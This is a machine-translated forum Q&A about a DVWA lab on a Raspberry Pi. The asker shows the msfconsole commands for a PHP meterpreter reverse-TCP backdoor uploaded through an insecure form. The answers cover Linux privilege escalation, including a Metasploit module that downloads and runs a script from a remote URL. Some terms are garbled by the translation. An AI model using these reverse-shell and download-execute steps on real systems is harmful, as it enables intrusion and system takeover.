web-dev-qa-db-fra.com

MSFConsole / Kali Linux - obtenez un accès root au système unix

Je déconne avec Kali Linux, MSFConsole et DVWA (Damn Vulnerable Web Application).

J'ai réussi à accéder au système (Raspberry Pi) en créant une porte dérobée PHP et en la téléchargeant via une injection SQL).

Maintenant que j'ai accès au système, le seul problème est que j'exécute en tant que www-data (ne serait-il pas agréable de devenir root pour créer votre propre compte de super-utilisateur?!) Est-il possible d'une manière ou d'une autre d'augmenter les privilèges sous Linux (Raspbaian) en utilisant MSFConsole, BASH (depuis la porte dérobée) ou d'une autre manière?

J'ai essayé d'exécuter "use priv" dans l'invite meterpreter mais l'erreur que j'obtiens est "Impossible de charger l'extension: aucun module du nom ext_server_priv.php n'a été trouvé". Si cela aide, j'exécute l'exploit reverse_tcp en tant que script PHP.

J'ai pu compromettre le système en exécutant ceci est Msfconsole

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

J'ai ensuite téléchargé hackme.php sur le serveur Web via le téléchargement de fichier non sécurisé, après avoir fait cela, j'ai ensuite parcouru le fichier téléchargé.

Nous remercions cette vidéo de m'avoir donné le code ci-dessus. (J'ai dû utiliser la fonction generate au lieu de msfpayload car cette fonctionnalité a été déplacée car elle est obsolète.)

9
iProgram

À ce stade, vous avez atteint les bases d'un compromis sur le système et vous êtes sur la deuxième phase commune d'exploitation qui est l'escalade de privilèges.

La façon exacte dont vous pouvez y parvenir dépend beaucoup du système en question, du code qui y est installé et de sa configuration. Quelques options à rechercher pour obtenir une élévation de privilèges sur un système Linux

  • Binaires racine SetUID accessibles en écriture par l'utilisateur sous lequel vous vous exécutez. si vous pouvez trouver quelque chose que vous pouvez remplacer qui, une fois exécuté, s'exécutera en tant que root, vous pouvez l'utiliser pour augmenter vos privilèges.
  • Vulnérabilités dans les services système s'exécutant en tant que root. Cela dépendra probablement de l'état du correctif du système sur lequel vous exécutez.

Autres éléments qui s'appliquent davantage aux tests de sécurité "réels" mais qui ne s'appliquent probablement pas à votre situation

  • Informations d'identification exposées dans les fichiers du système. Cela peut être un moyen courant d'exploiter les systèmes.
  • Attaques par mot de passe devinant. Deviner les informations d'identification est un bon moyen d'obtenir un accès supplémentaire
  • Pivotement de votre système attaqué vers un autre du même réseau. En général, une fois qu'un attaquant a pris pied dans un réseau, il recherchera d'autres systèmes susceptibles d'avoir des configurations intermédiaires supplémentaires qui pourraient être exploitées.
6
Rory McCune

Selon la documentation de metasploit, l'utilisateur priv est un module disponible uniquement pour le compteur de mesure Windows natif (pas pour les autres compteur).

Vous voulez probablement vous pencher sur l'escalade de privilèges Unix, que je ne connais pas. Je ne pense pas qu'il y ait un module automatisé pour metasploit qui ferait ça ...

Bonne chance ;)

1
RedPanda

Vous pouvez mettre à niveau votre Shell vers un Meterpreter avec des sessions -u <#> puis exécuter des modules de publication (par exemple, post/multi/recon/local_exploit_suggester) ou vous pouvez également prendre une session existante (Meterpreter ou non) et exécuter une escalade de privilèges locale exploiter, par exemple, udev_netlink, sock_sendpage, et al, en définissant la variable SESSION.

Certains modules varient selon le système d'exploitation ou le scénario, certains sont tout simplement difficiles à trouver dans la hiérarchie du framework metasploit. Essayez ce qui suit à partir de mètre mètre:

afficher le message

exécuter post/multi/<tab><tab>

exécutez post/linux/<tab><tab>

exécuter exploit/multi/<tab><tab>

Vous pouvez également exécuter une variété d'outils d'escalade de privilèges en dehors du cadre Metasploit et les lancer dans votre session. Voici deux modules qui contribuent à cet effort:

utiliser post/multi/rassembler/multi_commande

définir la RESSOURCE cmds.rc

utilisez post/linux/manage/download_exec

définir l'URL http://10.0.0.1/cmds.sh

Je vous suggère de préparer un système dans un laboratoire qui correspond aux qualités de votre système cible, par exemple, même système d'exploitation, niveau de correctif, installables, paramètres de configuration, et al. En conservant l'accès root sur cette cible de laboratoire maquette, vous pouvez recréer ce que vous tenterez de faire sur la cible réelle. De nombreux outils d'escalade de privilèges nécessitent un accès root pour les exécuter correctement, par exemple, Nessus et OpenVAS en mode authentifié, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check et enum4linux sont tous d'excellents outils dans ce domaine. espace. D'autres devront être exécutés uniquement sur le système cible réel, comme sucrack ou phrasendrescher. Certaines attaques par escalade de privilèges nécessitent beaucoup plus de planification, telles que l'exploitation des binaires setuid/setgid personnalisés. Le RPi nécessitera probablement un compilateur croisé pour les exploits, et beaucoup peuvent même ne pas fonctionner sauf si vous modifiez les décalages pour fonctionner avec les registres, les opcodes et l'endianness de la plate-forme ARM.

1
atdre